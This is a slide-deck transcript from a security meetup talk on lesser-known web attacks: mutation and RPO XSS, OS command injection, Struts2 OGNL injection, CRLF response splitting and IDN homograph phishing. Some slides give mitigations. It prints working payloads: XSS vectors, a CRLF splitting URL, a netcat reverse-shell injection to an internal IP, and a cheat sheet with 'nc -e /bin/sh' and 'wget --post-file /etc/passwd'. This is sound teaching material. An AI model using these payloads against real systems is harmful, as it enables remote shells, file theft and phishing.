Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
-
Upload
nullowaspmumbai -
Category
Technology
-
view
186 -
download
0
Transcript of Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang
Lesser Known WebAppAttacks
About me Consultant at Aujas Networks
Part time bug hunter
Individual Security researcher
Blogger
http://infinite8security.blogspot.in
Lesser Known WebAppAttacks
Menu Card
Cross site scripting –
Mutation XSS
RPO XSS
Zombie XSS
Remote Command Execution
CR-LF Attack
Homograph Attack
Lesser Known WebAppAttacks
HTML encoded payload
<listing><img src=1 onerror=alert(1)></listing>
we will put this piece of code into another code using innerHTML
property.
<listing id=x><img src=1 onerror=alert(1)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
When this code will execute, browser will read innerHTML and call
document.getElementById(‘x’)
Resulting in multiple level of decoding and mutate from safe to
unsafe state.
Lesser Known WebAppAttacks
Mitigation:
Server-side mitigation
• Avoiding outputting server content otherwise
incorrectly converted by the browser.
• The flawed content should be replaced with
semantically equivalent content which is converted
properly by the browser.
Client-side mitigation
• Browsers should implement ECMA Script 5 and higher.
• TrueHTML: TrueHTML relies on the XMLSerializer DOM
object provided by all of the user agents.
• https://cure53.de/fp170.pdf
Lesser Known WebAppAttacks
Cross site Scripting-RPO XSS
Relative path Overwrite xss
• Difference between Absolute and Relative url
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory
To exploit this findings three things are necessary,
1) stored XSS that allows CSS injection.
2) URL Rewriting.
3) Relative addressing to CSS style sheet.
Lesser Known WebAppAttacks
DEMO
• Step 1: Lets visit
www.webdevelopersnotes.com/graphics/index.php3
• To check URL re-writing add ‘/’
• Open re-writed url with xss payloadin IE
and see the Magic ;)
• http://challenge.hackvertor.co.uk/
xss_horror_show/chapter7/rpo.php/
Mitigation:• It is recommended that absolute URLs should be used
throughout a site.
• Otherwise relative root url should be used.
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash
Remote/OS Command Execution
Lesser Known WebAppAttacks
Lesser Known WebAppAttacks
Now what if ( ; ) is blocked by the application?
X ; Y = Seperating Commands (Run X and
then Y, regardless of success of X)
X | Y = PIPE (Run X and pass output of X to Y)
X ^ Y = PIPEZ
X && Y = AND (Run Y if X succeeded )
FAIL || Y = OR (Run Y if X failed)
X %0D Y %0D Z = OR
` X ` = Backtick
` X & Y ` = Background (Run Y and then run X in
background, regardless of success of X)
$( command )
nc -e /bin/sh = Netcat
wget --post-file /etc/passwd = WGET
Lesser Known WebAppAttacks
RCE never dies!!!
• "action:", "redirect:" or "redirectAction:" is not
properly sanitized.
• information will be evaluated as OGNL (Object-Graph
Navigation Language) expression against the value stack,
this introduces the possibility to inject server side code.
Apache struts2 RCE
http://host/struts2-
blank/example/X.action?action:${3*4}
Lesser Known WebAppAttacks
Divide and Conquer cR-LF Attack
• CR stands for Carriage Return (CR, ASCII 13, \r)
• LF stands for Line feed (LF, ASCII 10, \n)
How this Attack work?
The server script embeds user data in HTTP response headers.
Example: Step1: There is redirection page “redir_lang.jsp”
When we hit index page server responds with following response
<% response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang")); %>
Lesser Known WebAppAttacks
Lets Attack ;)
Step 3: Instead of passing value as English. Lets pass our attack
vector as shown.
/redir_lang.jsp?lang=foobar%0d%0aContentLength
:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCont
entType:%20text/html%0d%0aContentLength:%2019%
0d%0a%0d%0a<html>Shazam</html>
Note: We have URL encoded the CRLF sequences
Lets see what server responds with
Lesser Known WebAppAttacks
A first HTTP response, which
is a 302 (redirection)
response.
A second HTTP response, which is a 200 response, with a content comprising
of 19 bytes of HTML.
Superfluous data
So when the attacker feeds the target with two requests, the first
being to the URL/redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%
0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aCont
entLength:%2019%0d%0a%0d%0a<html>Shazam</html>
And the second to the URL > /index.html
The target would believe that the first request is matched to the
first response:
And the second request (to /index.html) is matched to the second
response:
Lesser Known WebAppAttacks
What Attacker can do by
CRLF attack?
Cross site scripting >>
http://blog.innerht.ml/twitter-crlf-injection
Web Cache Poisoning (defacement)
Cross User attacks (single user, single page, temporary
defacement)
Hijacking pages with user-specific information
Browser cache poisoning
Lesser Known WebAppAttacks
Lesser Known WebAppAttacks
Homograph Attack
Can you tell the difference?
1) https://ebаy.com/
2) https://ebay.com/
Lesser Known WebAppAttacks
What is this all about?http://ebаy.com/
Decoding to punycode
http://xn--eby-7cd.com/
Cyrillic alphabets
Lesser Known WebAppAttacks
What Attacker can do by
Homograph attack?
Phishing
Un-validated Redirection
Fake websites
Attacker may combine this with SSL attacks
http://www.blackhat.com/presentations/bh-dc-
09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
Thank You
Reach me @
LinkedIn: Ninad Sarang
Twitter: @hbkninad